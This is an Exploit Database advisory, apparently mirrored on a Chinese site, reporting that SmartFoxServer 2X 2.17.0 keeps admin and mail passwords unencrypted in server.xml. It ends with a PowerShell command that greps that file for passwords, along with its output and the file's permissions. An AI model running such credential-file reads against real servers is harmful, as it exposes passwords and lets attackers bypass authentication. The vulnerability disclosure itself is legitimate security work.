SmartFoxServer 2X 2.17.0 – Credentials Disclosure

• Exploit Database
• 18 阅读

• 作者： LiquidWorm
  日期： 2021-02-08
• 类别：

  • local
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49527/

• # Exploit Title: SmartFoxServer 2X 2.17.0 - Credentials Disclosure
  # Date: 29.01.2021
  # Exploit Author: LiquidWorm
  # Vendor Homepage: https://www.smartfoxserver.com
  
  SmartFoxServer 2X 2.17.0 Credentials Disclosure
  
  
  Vendor: gotoAndPlay()
  Product web page: https://www.smartfoxserver.com
  Affected version: Server: 2.17.0
  Remote Admin: 3.2.6
  SmartFoxServer 2X, Pro, Basic
  
  Summary: SmartFoxServer (SFS) is a comprehensive SDK for
  rapidly developing multiplayer games and applications
  with Adobe Flash/Flex/Air, Unity, HTML5, iOS, Universal
  Windows Platform, Android, Java, C++ and more. SmartFoxServer
  comes with a rich set of features, an impressive
  documentation set, tens of examples with their source,
  powerful administration tools and a very active support
  forum. Born in 2004, and evolving continuously since
  then, today SmartFoxServer is the leading middleware to
  create large scale multiplayer games, MMOs and virtual
  communities. Thanks to its simplicity of use, versatility
  and performance, it currently powers hundreds of projects
  all over the world, from small chats and turn-based games
  to massive virtual worlds and realtime games.
  
  Desc: The application stores sensitive information in an
  unencrypted XML file called /config/server.xml. A local
  attacker that has access to the current user session can
  successfully disclose plain-text credentials that can be
  used to bypass authentication to the affected server.
  
  Tested on: Windows (all) 64bit installer
   Linux/Unix 64bit installer
   MacOS (10.8+) 64bit installer
   Java 1.8.0_281
   Python 3.9.1
   Python 2.7.14
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2021-5627
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5627.php
  
  CWE ID: CWE-312
  CWE URL: https://cwe.mitre.org/data/definitions/312.html
  
  
  29.01.2021
  
  --
  
  
  PS C:\Users\t00t\SmartFoxServer_2X\SFS2X\config> Get-Content server.xml | Select-String -Pattern passw -Context 1,0
  
  <login>sfsadmin</login>
  > <password>Waddup</password>
  <login>testingus</login>
  > <password>123456</password>
  <mailUser>username</mailUser>
  > <mailPass>password</mailPass>
  
  
  C:\Users\t00t\SmartFoxServer_2X\SFS2X\config>icacls server.xml
  server.xml NT AUTHORITY\SYSTEM:(I)(F)
   BUILTIN\Administrators:(I)(F)
   LAB42\t00t:(I)(F)